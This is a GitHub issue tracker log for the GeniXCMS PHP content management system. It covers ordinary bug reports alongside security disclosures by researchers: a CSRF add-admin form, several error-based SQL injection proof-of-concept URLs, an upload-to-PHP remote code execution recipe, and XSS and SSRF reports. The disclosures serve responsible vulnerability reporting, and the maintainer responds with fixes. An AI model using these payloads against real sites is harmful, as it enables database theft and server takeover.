[2015-02-18 01:23] semplon opened #3 "When Updating Menu, no Informations"
No information if the update is done or not. No error or success.
If success it should be redirected to menu manager.

[2015-02-18 01:28] semplon opened #4 "MySQL Table standard fix"
For some database column, there is a name to fixed. Not standard and the name of the column is reserved by mysql itself.

eg: order, group, etc.

[2015-02-18 01:31] semplon opened #5 "Installer is needed for More standard"
Installer is still needed for more standard environment.
Right now still get constant from config.php rather from the database itself.
And there is two value with the same content. eg: GX_URL and Options::get('sitename')
This will confusing the developer itself.

[2015-02-21 13:20] semplon commented on #5
fixed on first release v0.0.1

[2015-02-21 13:20] #5 closed

[2015-02-21 13:20] semplon commented on #3
fixed

[2015-02-21 13:20] #3 closed

[2015-02-26 22:37] raisiqueira opened #6 "User email in admin panel"
Hi, The user e-mail field in the admin panel are with type password....

[2015-02-27 04:17] semplon commented on #6
hi, thanks for the report. will be fixed on next update

[2015-03-05 20:27] liquidworm opened #7 "Multiple security issues [xss,sqli,csrf,]"
Hi

Multiple vulnerabilities discovered in GeniXCMS 0.0.1.

Please respond to gjoko@zeroscience.mk for more details.

Thanks,
Gjoko

[2015-03-06 08:24] semplon commented on #7
Hello,

Thank You for your report, can You share it in here the vulnaribilities ?

Many Thanks,

[2015-03-06 13:08] liquidworm commented on #7
Hi,

Sure, here are the details:

1. CSRF Add Admin:

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
      <input type="hidden" name="userid" value="Testingus" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="email" value="test&#64;test&#4

[2015-03-06 13:10] liquidworm commented on #7
Hi,

Sure, here are the details:

1. CSRF Add Admin:

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=users"
method="POST">
      <input type="hidden" name="userid" value="Testingus" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="email" value="test&#64;test&#4

[2015-03-07 01:26] semplon commented on #7
Thank You for your share. I'm glad to know about this. Will be fixed soon.

[2015-03-10 01:56] semplon commented on #7
Hi @liquidworm I want to inform you that the security fix had been done. Please download and try the master branch.

thanks

[2015-03-10 01:57] semplon commented on #6
Hi @raisiqueira, this fix is already done. Download the master branch with the security fixs improvement.

[2015-03-10 01:57] #6 closed

[2015-03-10 01:57] #7 closed

[2015-03-10 02:59] liquidworm commented on #7
Thank you for the update, will do.

Cheers.

* Gjoko Krstic*
*Information Security Engineer*

*Zero Science Lab*
Macedonian Information Security Research & Development Laboratory
http://www.zeroscience.mk

+389 (0) 75 290 926
+389 (0) 77 670 886

On Tue, Mar 10, 2015 at 2:57 AM, Puguh Wijayanto <notifications@github.com>
wrote:

[2015-03-11 11:42] raisiqueira commented on #6
Tanks! :dancers:

[2015-03-11 12:37] raisiqueira opened #8 "The file for the password reset does not exist in gxadmin"
Hi!
The file for the password reset does not exist in gxadmin. By clicking on forgot password, we are redirected to a page that does not exist (forgotpassword.php).

[2015-03-11 13:14] semplon commented on #8
Hi,
Thanks for the report. I'll add that on the next update.

[2015-03-12 19:58] raisiqueira opened #9 "User admin incorrect"
Hello, the admin user is with the wrong password, how do we reset without forgotpassword.php?

[2015-03-13 02:13] semplon commented on #9
Hi, for that you can register a new user. access register.php at the browser. after the registration is done. go to the phpmyadmin and set the group of the new user with 0
now login with a new user. it's had a admin privilege. change the password of the admin. and now you can login with the previous admin.

[2015-03-13 17:07] raisiqueira commented on #9
Return this error:
![screenshot_3](https://cloud.githubusercontent.com/assets/2914170/6643327/6880560e-c9a3-11e4-975b-aeba2dcb34e3.png)

[2015-03-13 21:51] semplon commented on #9
thanks for the report. please take a look at your database options table. is there a value with name tokens ? if not insert a value with name tokens and value is empty.

I'll commit an update regarding the register.php files.

[2015-03-14 03:39] semplon commented on #9
I'll try to make the forgotpassword file tonight. I just finished the Modules and Themes Installer. So we can create a custom themes and modules.

[2015-03-14 14:52] raisiqueira commented on #9
Great, I will test the fixes that you did and come back to report if any error acontercer. I will wait the modules for creating themes ...: D

[2015-03-14 14:55] semplon commented on #9
Hi, it's already done. Please try install the master branch. see the demo site for the showcase how themes and modules work.

I know why you can't login after install. it's the installer which had a bug and I've already improve it.

[2015-03-14 15:24] #9 closed

[2015-03-15 02:48] semplon commented on #8
https://github.com/semplon/GeniXCMS/commit/7b61a1ca7205be609b39f4e7303317d93f6f8c7d

just commit a forgotpassword.php files on both frontpage and admin area.
and add more improvement.

[2015-03-15 02:48] #8 closed

[2015-04-29 09:38] vdanelia opened #10 "UTF-8 Issue"
Hello friends I'm testing the cms
I found that It doesn't support unicode utf-8 until I manuali added it in index
"<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />"
it would be a good if you add this option from admin panel

After I added it works, now I can write in Georgian Language without any problem

[2015-04-29 09:42] vdanelia opened #11 "Module Menu options Is Not Displayed When adding new menu"
When I wanted to add module as Menu, in Menu Type in mod dropdown list the mods aren't displayed, Please correct it.

[2015-04-29 09:52] vdanelia opened #12 "Pagination Type Issue"
When selected pagination style from Pager to Number not affecting...
Every time "Pager"

[2015-05-05 22:11] semplon commented on #10
Thanks for your report. I'll add it on the next update.

[2015-05-05 22:12] semplon commented on #11
The module menu is still in development. Will be added with new features and backend features.

thank You

[2015-05-05 22:16] semplon commented on #12
Thanks for your report. I think i'm hard coded the value of pagination type to pager. I'll fix it soon.

[2015-05-06 10:04] vdanelia opened #13 "Question About Multilingual Content"
Semplon I'm testing your CMS it's really very good and smart... I found the cms language file, so as I guessed the cms supports multilingual content, but couldn't figure out how to switch between languages,  or how to enter post in 2 Languages (Can't found Language data selector, container) I have translated the English file to Georgian (My native language).

Thank you in Advanced

[2015-05-06 14:09] vdanelia opened #14 "Add New Post Issue"
If I want to add new post, but if I don't select any category the article is posted anyway (without any category, there is no warning "Category cannot be empty")

[2015-05-06 14:15] vdanelia opened #15 "CMS System Language Enhancement"
CMS System Language Can be changed manually from config.php, but it would be more convenient to change it from Admin Panel (From The Settings Page: Select Language or something like)

[2015-05-07 14:10] semplon commented on #14
Thanks @vdanelia, added at the waiting list for bugs .

[2015-05-07 14:11] semplon commented on #15
It would be great. So people won't edit the config file manually and messed up the code.
I'll add it at the next release update.
Thanks for the suggestions.

[2015-05-09 12:35] Scavolini-Pesaro opened #16 "Mysql storing wrong character format"
Congratulations for the CMS, it will be very good.

I found a big mistake: If you save a post in admin with utf8 characters (after you add the missing utf8 charset line to admin header.php), the special utf8 characters saved in wrong format at the mysql database, like & aacute;  (the good format is á ) I dont know which file causing the wrong format (I thought typo.class.php or db.class.php, but I

[2015-05-09 13:09] semplon commented on #16
Thanks @Scavolini-Pesaro  for reporting the issue. about that it was generated by Typo::cleanX(). All inputted values are converted by htmlentities for security reason to prevent SQL Injection. To reverse it use Typo::Xclean() function.

I hope that can explain the problem why i do that.

thanks

[2015-05-11 05:28] semplon commented on #10
this issue was fixed.

[2015-05-11 05:29] semplon commented on #12
this issue was fixed and i will close it for now.

[2015-05-11 05:29] #12 closed

[2015-05-11 05:29] semplon commented on #14
this issue was fixed and i will close it for now.

[2015-05-11 05:29] #14 closed

[2015-05-11 05:29] semplon commented on #15
this issue was fixed and i will close it for now.

[2015-05-11 05:29] #15 closed

[2015-05-11 05:30] semplon commented on #16
this issue was fixed and i will close it for now.

[2015-05-11 05:30] #16 closed

[2015-05-11 05:30] #10 closed

[2015-05-11 05:31] semplon commented on #13
This is a complex things to do. I think i'll create another branch and work for it.

[2015-05-13 09:25] vdanelia commented on #16
Ok Thanks Semplon

[2015-05-18 16:35] tucuta opened #17 "Installation Error"
I like this cms.
I have this error in my installation:
[code]
Any solution ... ???

Thanks in advance for the help you can give me.

[2015-05-19 01:57] semplon commented on #17
Hello, Thank You for installing GeniXCMS. Please make sure your PHP version is above 5.3. And then, please make sure the php openssl library was installed.

Locate the php.ini file. change ;extension=php_openssl.dll to extension=php_openssl.dll

[2015-05-27 19:21] #17 closed

[2015-06-03 10:06] vdanelia opened #21 "Add New User Password Issue"
When Creating, adding new user we have to enter the password + retype password
If i enter different passwords for the field "Password" and "Retype Password" the user is registering..
the system must say "Password doesn't" match or something like

[2015-06-03 14:10] semplon commented on #21
fixed

[2015-06-03 14:10] #21 closed

[2015-06-08 09:01] vdanelia commented on #11
Thanks :+1:

[2015-06-08 13:32] semplon commented on #11
not yet. i'm still find a simple solutions for that.

[2015-06-09 19:07] vdanelia opened #23 "Post Title Issue!"
When editing the post (for something, i just did tests) we have to reenter the post title again, after edit the post title is dissapearing

Tests showed me... if the post title begins with (" ") when editing needed to enter title again

[2015-06-09 19:14] vdanelia opened #24 "Post Enhancement Needed"
When posting a big text / article or news in front page it displays full text, there must be read more function, it is very convenient when working with big texts

[2015-06-10 00:03] semplon commented on #24
Hello @vdanelia  thanks for the report. Yes I'm aware that. I hadn't touch the post format yet.

[2015-06-10 00:04] semplon commented on #23
Thanks for the report. I'll take a look more about this problem.

[2015-06-11 14:26] vdanelia opened #26 "CDN Problem, Need Some Implementation"
Today when working with the script for hard testing purposes the CDN site cdnjs.cloudflare.com was stuck and i was not able to work correctly, had some troubles... after the cloudflare went ok the script itself went ok too...
So We need some improvements: (If the CDN fails the script must work from local js files and resources)
This is very important!

[2015-06-14 16:44] Scavolini-Pesaro opened #27 "Language selection"
Hello Semplon!

I have a question for you, I still testing your promising CMS. There is an easy solution for user change their language settings? Because I see that at admin the language selection working good, but I think it will be very good if visitors (guests) could change language settings via the website index template, like index.php?lang=it (Italian) or index.php?lang=fr (French) etc.. And

[2015-06-15 00:24] semplon commented on #27
Thank You @Scavolini-Pesaro for testing GeniXCMS. Yes You are right. In the future visitors can change the language, this features will be implemented along with the multi language feature, including posts, categories, menus, etc. This features still in development right now.

Yes, It's the same.

[2015-06-24 03:45] #27 closed

[2015-06-27 13:34] semplon commented on #23
This issue had been fixed with the release of version 0.0.4

[2015-06-27 13:34] #23 closed

[2015-07-03 17:55] semplon commented on #24
this issue solved 195d135a121937f973f759cabd99843d0f1c377e

[2015-07-03 17:55] #24 closed

[2015-07-09 19:41] semplon commented on #13
I'm starting working with multilanguage. see this branch https://github.com/semplon/GeniXCMS/tree/multilang

[2015-07-09 19:41] semplon commented on #27
Hello, I'm starting working with multilanguage. seet this branch
https://github.com/semplon/GeniXCMS/tree/multilang

thanks

[2015-09-08 01:57] akiu opened #28 "installing issues : failed to generate table in database"

[2015-09-08 03:05] #28 closed, assigned to nobody

[2015-09-16 06:16] semplon commented on #13
this issue is closed. I've already commit multilanguage at the master branch and on progress for more improvement.

[2015-09-16 06:16] #13 closed

[2015-09-16 22:00] semplon opened #31 "Posts Edit Form show Error when Token at the URL is missing"
![image](https://cloud.githubusercontent.com/assets/3163608/9919728/ebfc2736-5cf8-11e5-895e-abdac9504202.png)

[2015-09-16 22:01] semplon opened #32 "Add Multilanguage for Categories, Menus"
Add Multilanguage field for Categories and Menus. Just like at Post and Page form.

[2015-09-16 22:01] semplon opened #33 "Add Tags field when submitting Post"
Add tags field at the posts form.

[2015-09-16 22:03] semplon opened #34 "Add icon image for Categories and Menus"
Add new feature, Icon image for Categories and Menus

[2015-09-16 22:05] semplon opened #35 "Add Flags list at the front end for Multilanguage"
Add flags list or dropdown for multilanguage.

[2015-09-16 22:07] semplon opened #36 "Add more User Level"
Add more User level when creating or editing new user.

[2015-09-16 22:09] semplon opened #37 "Add version checker for Latest Release"
Add version checker for latest release. So people will notice when the new version is exist.

[2015-09-16 22:12] semplon opened #38 "Add PDO MySQL and Improve how handle the Inputted data"
Add PDO MySQL and Improve how handle the inputted data. Run db prepare before execute.

[2015-09-16 22:39] semplon opened #39 "Backend Footer js and css library use independent inclusion. Don't use Site::footer()"
To make it more custom, the backend interface use a different command for inclusing the js and css library. So when people decide not to load the available library at the settings page the backend is still safe, not messed up.

[2015-09-16 22:46] semplon opened #40 "When Multilanguage is Enabled, No image inserted at the second form."
When multilanguage is enabled. If we add new image at the second form it not inserted at all.

[2015-09-16 22:56] semplon opened #41 "404 Not Found when Access lang param at url if Smart Url is disabled"
if we add lang parameter at the url when the smart url is disabled error 404 not found.

![image](https://cloud.githubusercontent.com/assets/3163608/9920709/b6d45508-5d00-11e5-9983-4eabb3ead0e8.png)

[2015-09-17 09:28] semplon opened #42 "Multi Language value is empty when The submitted data not Cleaned"
This happen when we add another language and want to edit it. The json_decode value is empty. No language data exported.

[2015-09-17 09:29] #42 closed

[2015-09-17 11:38] #41 closed

[2015-09-17 15:22] #37 closed

[2015-09-17 15:30] #31 closed

[2015-09-17 15:37] #36 closed

[2015-09-17 18:05] semplon opened #43 "Add Widget/Block feature"
Add widget like feature. This must be a simple options. Will look like joomla had.

[2015-09-17 19:38] #35 closed

[2015-09-17 20:34] semplon opened #44 "Add Bootstrap Datetime Picker"
Add datetime picker with bootstrap support for date input. So people won't add it manually.

[2015-09-17 20:39] semplon opened #45 "Prepare the Posts Result and Choose to use the prefered language for Multilanguage"
Use this code located at `posts.control.php`

[code]

Split this code and create new method.
This will be useful when facing multilaguage options for posts and pages.

i'm sleepy now. This is to do list.

[2015-09-18 05:40] #45 closed

[2015-09-19 00:12] semplon opened #46 "Add Email validator upon submission."
It would be great if add email validator and see if the email address is valid or not.

[2015-09-19 00:47] semplon opened #47 "Add more information at installation page"
Add more information so user know what to fill in the input field upon installation. I've test it at some school and some students just don't get it what to write. duh!

[2015-09-19 09:15] semplon opened #48 "On Post Submission The Json Post param shows up"
This happen when we add new post. The Json content was shows up.

[2015-09-19 09:18] #48 closed

[2015-09-19 10:30] semplon opened #49 "Login Page Session Error. Session already start."
Login page error, session already start.

[2015-09-20 01:37] #49 closed

[2015-09-20 06:04] semplon opened #50 "Ajax not working when using Nginx server and Enabling SMART_URL"
Ajax request not working when installed at Nginx Server and enabling the SMART_URL

[2015-09-20 06:09] semplon opened #51 "When SMART_URL is active, The language param must get from URL. Not the session."
This happen when we access the url directly. The content is not change as per selected language. Considering Duplicate content if not fixed.

[2015-09-21 02:42] #51 closed

[2015-09-21 02:43] #50 closed

[2015-09-21 12:50] #47 closed

[2015-09-21 13:08] semplon opened #52 "Add Modules Control to load per modules page at the frontpage"
this feature need to be added so we can create pages based on modules function.

[2015-09-21 14:53] semplon commented on #52
finish this to work with #11

[2015-09-21 16:24] #39 closed

[2015-09-30 00:05] semplon opened #53 "When not connected to the internet, the version checker display error"
The version checker display error when no internet connections.

[2015-10-03 13:51] #53 closed

[2015-10-26 07:05] GaneshKandu opened #54 "Error During Logout"
Hi Its Ganesh Kandu
I have Installed GeniXCMS 0.0.7 in My PC and getting an error on logout
<br />
<b>Warning</b>:  session_destroy(): Trying to destroy uninitialized session in <b> /geni289/inc/lib/Session.class.php</b> on line <b>103</b>
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at  /public_html/geni289/inc/lib/Session.class.php:103) in <b> /publ

[2015-10-26 15:16] semplon commented on #54
Hi @GaneshKandu, Thanks for submitting the issue. I'll fix it soon.

[2015-11-19 02:25] heriwahyudianto opened #55 "question: how to get post looping by category"
Hi, I want get post's excerpt by category? how is the code?

[2015-11-19 15:08] semplon commented on #55
Hi, to get post's excerpt by category you can use this code

[code]
try that code above, and let me know if it's working. I'll add this method at the next release.

thanks,

[2016-03-08 00:05] AlexL777 opened #56 "Smart URLs in a Sub-Directory not worked"
Hello Developers,

I have a problem with the smart URLs in the sub-directories. My Genix-blog is under http://wpzweinull.ch/cms/genix and is not as accessible. But I have already written a test article and this is attainable.

How can it be that I can not explain it ?!

In the .htaccess file now looks like this:

    RewriteEngine On
    RewriteBase /cms/genix/

    RewriteCond %{REQUEST_FILENAME}

[2016-03-11 05:46] semplon commented on #56
Hello @AlexL777, thank you for submitting the issue. I will check and test it.

[2016-03-13 12:49] #54 closed

[2016-03-13 12:49] semplon commented on #56
Hello, This problem had been fixed.

[2016-03-13 12:49] #56 closed

[2016-03-13 12:49] semplon commented on #55
This issue had been added to core library

[2016-03-13 12:49] #55 closed

[2016-03-14 15:18] AlexL777 commented on #56
Thank you, the problem is now eliminated with me. I still have an issue with the Disqus comments.

[2016-03-14 15:22] semplon commented on #56
what issue did you had with Disqus comment ?

[2016-03-14 15:22] AlexL777 opened #57 "How do you implement Disqus comments at Genix CMS"
Hello Developers,

I would like to put in this CMS on Disqus comments and only needs to remove Facebook Comments. How can I realize it?

Disqus code could integrate the template and probably I let even the Facebook comments.

Which file in the template is responsible?

Thanks in advance.

[2016-03-14 15:35] semplon commented on #57
Hello @AlexL777

To change the Facebook comment with Disqus is easy. Just open the `single.php` file inside the theme folder. If you familiar with wordpress i think You will change it fast.
See image below for details.
![open single-php](https://cloud.githubusercontent.com/assets/3163608/13749574/b32b494a-ea34-11e5-9fa7-7e53abc3348a.png)

after You open the single.php file, scroll down until you s

[2016-03-15 00:32] AlexL777 commented on #57
Thanks for your tip with the comments, but unfortunately I get so see a white page and apparently it does not work that way.

The code in the single.php is with me then so:

    <h3>Comments</h3>
                                <div id="disqus_thread"></div>
    <script>
    /**
     *  RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLA

[2016-03-15 04:48] semplon commented on #57
Hello, Sorry I forgot to tell you that it's inside echo. the `"` sign inside the echo should be backslashed first before. I just modified it and test it at my localsite. use this code.

[code]

## See it in action.

![disqus](https://cloud.githubusercontent.com/assets/3163608/13768012/c4860ed6-eaa3-11e5-8391-08cbe804ee31.png)

[2016-03-15 07:23] #44 closed

[2016-03-15 09:03] AlexL777 commented on #57
Thank you, just awesome and it works. So now I have perhaps a little better chance of feedback in the blog than Facebook comments :)

Thanks again!

[2016-03-15 09:39] semplon commented on #57
You're welcome :D

[2016-03-15 09:39] #57 closed

[2016-03-15 10:17] GaneshKandu commented on #54
Please Reply When you done :+1:  Thanks

[2016-03-15 10:32] semplon commented on #54
this issue was fixed. please try to download our latest master version.

thanks

[2016-03-15 10:59] GaneshKandu commented on #54
Hi, am Getting Blank Page on
http://{{ ip }}/genix/gxadmin/ &
http://{{ ip }}/genix/

[2016-03-15 11:10] semplon commented on #54
hello, can you send me the error log ?
if you success installing it. please go to inc/config and open config.php
set this value `error_reporting(0);` to `error_reporting(E_ALL);`
and then send me the error reported by the browser.

thanks

[2016-03-15 11:12] GaneshKandu commented on #54
got That

Parse error: syntax error, unexpected '[' in /home/soft/public_html/manual/genix/inc/lib/Router.class.php on line 99

[2016-03-15 11:19] semplon commented on #54
thanks, please open `inc/lib/Router.class.php`
go to line `84`. replace it with this code

[code]

let me know if it's work

thanks

[2016-03-15 11:22] GaneshKandu commented on #54
still Getting Same

<br />
<b>Warning</b>:  require({{httpdoc}}/manual/genix/gxadminautoload.php): failed to open stream: No such file or directory in <b>{{httpdoc}}/manual/genix/gxadmin/logout.php</b> on line <b>24</b><br />
<br />
<b>Warning</b>:  require({{httpdoc}}/manual/genix/gxadminautoload.php): failed to open stream: No such file or directory in <b>{{httpdoc}}/manual/genix/gxadmin/logout.

[2016-03-15 11:29] semplon commented on #54
ah, thank you for bringing this up. i miss something.

at the `/gxadmin/logout.php` match with this code

[code]

at the `/logout.php`  match the content with this code

[code]

let me know if it's work.

thanks

[2016-03-15 11:32] GaneshKandu commented on #54
Working very well :+1:

[2016-03-15 11:33] semplon commented on #54
cool, thank you for reporting the issue

[2016-03-15 11:34] GaneshKandu commented on #54
Thanks to Fix

[2016-03-17 07:24] #33 closed

[2016-03-17 07:24] semplon commented on #33
https://github.com/semplon/GeniXCMS/commit/162c5b6b82725021755baa896fd517335a0a9a81

[2016-03-22 16:38] Strikersb opened #58 "a security issue [sql injection]"
Hi,friend

Im Striker, from China

a vulnerability discovered in GeniXCMS 0.0.8

Please respond to [song@secbox.cn](mailto:song@secbox.cn) for more details.

Thanks

[2016-03-23 09:55] semplon commented on #58
hello, i've already sent the email to your email.

thanks for bringing up the issue.

[2016-03-23 10:59] Strikersb commented on #58
Could you please help me to apply for a CVE-ID?
I really want CVE-ID  @semplon

[2016-03-23 15:29] semplon commented on #58
Hi, thanks for the details. I will update it soon. for getting your own CVE-ID you can get it from mitre.org website. Below are some links how to get CVE-ID

http://cve.mitre.org/cve/request_id.html

It's you who sould ask the ID by sending email to them.

I hope this could help You.

Once again, thanks for the issue.

[2016-08-14 04:23] semplon commented on #58
fixed https://github.com/semplon/GeniXCMS/commit/d885eb20006099262c0278932b9f8aca3c1ac97f

[2016-08-14 04:23] #58 closed

[2016-08-14 04:23] semplon commented on #52
done https://github.com/semplon/GeniXCMS/commit/d885eb20006099262c0278932b9f8aca3c1ac97f

[2016-08-14 04:23] #52 closed

[2016-08-14 04:23] semplon commented on #11
done https://github.com/semplon/GeniXCMS/commit/d885eb20006099262c0278932b9f8aca3c1ac97f

[2016-08-14 04:23] #11 closed

[2017-01-02 00:27] #38 closed

[2017-01-02 00:40] semplon commented on #26
I fix this by load local assets for admin pages. i hope this helpfull

[2017-01-05 06:45] l3m0n opened #59 "A bug"
/inc/lib/Control.class.php
`    public static function frontend()
    {
        $arr = ['ajax', 'post', 'page', 'cat', 'mod', 'sitemap', 'rss',
                    'account', 'search', 'author', 'tag', 'thumb', 'default'];
`

array error,i cann't install,

why not?
`
 public static function frontend()
    {
        $arr = array('ajax', 'post', 'page', 'cat', 'mod', 'sitemap', 'rss',

[2017-01-05 07:01] semplon commented on #59
hello @l3m0n thanks for reporting the issue. had you succeed after changed that to array ?
it's working fine at my server. which PHP version did you use ?

[2017-01-05 07:29] l3m0n commented on #59
php 5.3.29

[2017-01-05 07:34] semplon commented on #59
@l3m0n thank you, i will fix that problem, since there are still people using that version.

[2017-01-05 07:53] l3m0n commented on #59
You're welcome.I also found a security problem,

[code]

the version is 1.0，diff version 0.8

[code]

I don't think it's safe

`$activation = Typo::strip(Typo::cleanX($_GET['activation']));`

you can see:

`http://demo.genixcms.org/register.php?activation=1%27and%20updatexml(1,(select%20version()),1)%23`

Typo class can defend some XSS,but sqli cann't
login.php and forgotpassword.php also have som

[2017-01-05 08:16] semplon commented on #59
@l3m0n thank you for the report, i'll fixt that soon.

[2017-01-05 08:22] semplon commented on #59
after i check the demo site codes, it looks like that's still old version 1.0 codes. it's the early development of version 1.0 which hadn't secured yet.
the `$activation = Typo::strip(Typo::cleanX($_GET['activation']));` code secure very well at my localhost which had the latest development.

[2017-01-05 08:49] l3m0n commented on #59
ok, then I'll keep looking.
which php version did you use?

[2017-01-05 08:54] semplon commented on #59
i'm using 5.6.27

[2017-01-06 18:44] l3m0n opened #60 "safety problem"
`/inc/lib/Control/Ajax/tags-ajax.control.php`

[code]

I think you know this.

[code]

but it need editor.

this is my exp:
`GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23`

![](http://images2015.cnblogs.com/blog/804631/201701/804631-20170107024109675-21453183

[2017-01-07 18:42] semplon commented on #60
thank you for reporting this. i'll fix this on the next commit.

[2017-01-08 02:35] l3m0n commented on #60
You're welcome.In fact, I would like to apply for CVE, I do not know this?

[2017-01-08 02:35] #59 closed

[2017-01-08 03:58] semplon commented on #60
@l3m0n to request CVE please do this step https://cve.mitre.org/cve/request_id.html

[2017-01-09 10:27] l3m0n opened #61 "[sql injection]"
### [sql injection]
1. issue1:

	/inc/lib/Control/Backend/posts.control.php

[code]

	exp1:

[code]

2. issue2:

	/inc/mod/newsletter/options.php

[code]

	exp2:

[code]

[2017-01-09 10:29] l3m0n commented on #61
I found some unsafe method to cause a lot of problems.

I hope this helps you.

---

### method issue

[Db.class.php](https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Db.class.php)

Can see this in Db.class.php, You can see that escape is safe.
It is used in **insert/update** etc. But it is not used in **select**.

[code]

This program will generally use `Typo::cleanX` to deal with `$_POST\

[2017-01-09 10:33] l3m0n commented on #61
I would like to apply for cve-id, I really hope you can help me.T

[2017-01-10 04:57] attritionorg commented on #61
First, make sure the issues are legitimate and the vendor has verified them. If they are issues, then you or the vendor can request IDs from https://cveform.mitre.org/.

[2017-01-12 02:48] Strikersb commented on #61
@l3m0n  master really handsome

[2017-01-12 04:18] semplon commented on #61
Hello @l3m0n, thanks again for introducing the issues. I'm very excited to know the issues so I can improve GeniXCMS.
**[sql injection]**
**part 1:**
About the sql injection part 1. I'm aware that and already do optimize about the query, and will upload upon next commit.

**part 2:**
thanks for reporting this, this modules hadn't in touch for a long time since i was focusing on the features. I wil

[2017-01-13 04:42] Xyntax opened #62 "Authenticated Remote Command Execution"
Version
---
Github latest

PoC
---
1 Login and request `http://localhost/GeniXCMS/gxadmin/index.php?page=media`

2 Upload an edited png file with php code in it.

![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%2011-41-28.png)

3 Rename ext to `.php7`
![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%2012-39-39.png)
![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%

[2017-01-13 08:17] Xyntax opened #63 "Possible XSS Vulnerabilities in User Prompt Function"
Data in `$data['alertSuccess']` and `$data['alertDanger']` is passed directly to the DOM without any filtering, resulting in XSS vulnerability.

[code]

![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%2016-14-33.png)

Related codes

* https://github.com/semplon/GeniXCMS/blob/master/register.php#L166
* https://github.com/semplon/GeniXCMS/blob/master/login.php#L117
* https://github.com/s

[2017-01-13 08:58] Xyntax opened #64 "Local URIs Server Side Request Forgery"
The media uploader allows the attacker to make server send a GET request to intranet addr or anything which can be accessed via IP address.

![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%2016-31-31.png)

PoC

![pic](http://static.cdxy.me/Screenshot%20from%202017-01-13%2016-30-57.png)

So basicly GeniXCMS installations can send unwanted scrape/scan requests on behalf of their user inv

[2017-01-13 10:41] Xyntax opened #65 "Multiple XSS Vulnerabilities"
1
---
`./gxadmin/inc/pages_form.php`
line 68

[code]

2
---
`./gxadmin/inc/posts_form.php`
line 55

[code]

3
---
`./gxadmin/inc/posts_form.php`
line 25
[code]
line 55
[code]

4
---
`./gxadmin/inc/menus_form.php`
line 79
[code]

5
---
`./gxadmin/inc/menus_form_edit.php`
line 26
[code]
line 225
[code]

6
---
`./gxadmin/inc/menus_form_edit.php`
line 18
[code]
line 104
[code]

7
---
`./gxadmin/inc/us

[2017-01-14 01:30] semplon commented on #62
thank you for bringing up this issue. i'll fix it soon.

[2017-01-14 01:32] semplon commented on #63
yes you are right, i hadn't filter the strings. i'll fix this soon. thanks @Xyntax

[2017-01-14 01:36] semplon commented on #64
thank you again @Xyntax. i'll fix it soon.

[2017-01-14 01:38] semplon commented on #65
thank you @Xyntax. yeah there are still more issues available and i'm happy to know them. i'm still focusing on the features recently. i'll fix it soon.

[2017-01-14 08:03] Xyntax opened #66 "SQL Injection in `author.control.php`"
Source
---
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Frontend/author.control.php#L39-L43

[code]

PoC
---
`http://localhost/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20bPMf`

[2017-01-14 08:32] Xyntax commented on #66
Same issue in `author.control.php` with param `type`

[code]

[2017-01-14 09:19] Xyntax opened #67 "Multiple SQLI caused by functions in `Posts.class.php`"
Source
---

https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Posts.class.php#L313

Functions `getParam()`, `delParam()` and `existParam()` do not filter any incoming parameters, resulting in many SQL injections.

Here is an example.
[code]

Injection 1
---
`pages.control.php` line 165
[code]

Injection 2
---
`pages_form.php` line 133
[code]
then `$_GET[id]` is parsed into `Posts::getParam`

[2017-01-15 12:26] #61 closed

[2017-01-19 05:59] superfish9 opened #68 "SQL Injection in `Options.class.php` through 0.0.8 version"
### GeniXCMS_v0.0.8/inc/lib/Mod.class.php
[code]
### continue:
[code]

### GeniXCMS_v0.0.8/inc/lib/Options.class.php
[code]

### POC:
first, access forgotpassword.php to get a token:
`token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm`
then access:
`http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5L

[2017-01-19 12:51] semplon commented on #68
thank you @superfish9 i'll looking for it.

[2017-01-19 13:25] semplon commented on #68
Options.class.php security fix already fixed with this commit https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Options.class.php#L57

[2017-01-20 11:03] Dliv3 opened #69 "SQL injection in register.php GeniXCMS v0.0.8(latest version)"
/register.php
[code]
the `activation` param leads to sql injection vulnerability
POC:
[code]
We'll find that the database version in the response page, which proved the vulnerability exist.

By the way, if you can help me apply for a CVE-ID, i will be very grateful.XD

[2017-01-20 12:52] semplon commented on #69
this has been fixed with this commit. https://github.com/semplon/GeniXCMS/blob/master/register.php#L119

thanks

[2017-01-21 02:55] #69 closed

[2017-01-21 02:55] #67 closed

[2017-01-21 02:56] #66 closed

[2017-01-21 02:56] #65 closed

[2017-01-21 02:56] #63 closed

[2017-01-21 02:56] #62 closed

[2017-01-21 23:02] fgeek commented on #62
Could you please create a new release to https://genixcms.org/ with the fixes, thanks? I could ask users to update their installations.

[2017-01-22 02:27] semplon commented on #62
hi @fgeek just a little bit. there is still one security issue left. i will commit it soon.

thank you,

[2017-01-22 04:45] #64 closed

